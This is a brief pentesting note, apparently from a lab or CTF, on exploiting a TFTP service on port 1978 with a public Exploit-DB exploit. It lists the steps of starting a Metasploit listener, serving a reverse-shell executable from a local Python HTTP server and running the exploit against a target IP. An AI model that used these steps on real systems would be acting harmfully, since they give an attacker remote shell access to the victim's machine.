1978 - Pentesting tftp Exploit: https://www.exploit-db.com/exploits/50972 Steps: - download exploit from exploit-db - prepere metasploit lisener - expose shell_ps_4444.exe on python3 -m http.server 80 - execute exploit python3 50972 $IP_TARGET $IP_LOCAL shell_ps_4444.exe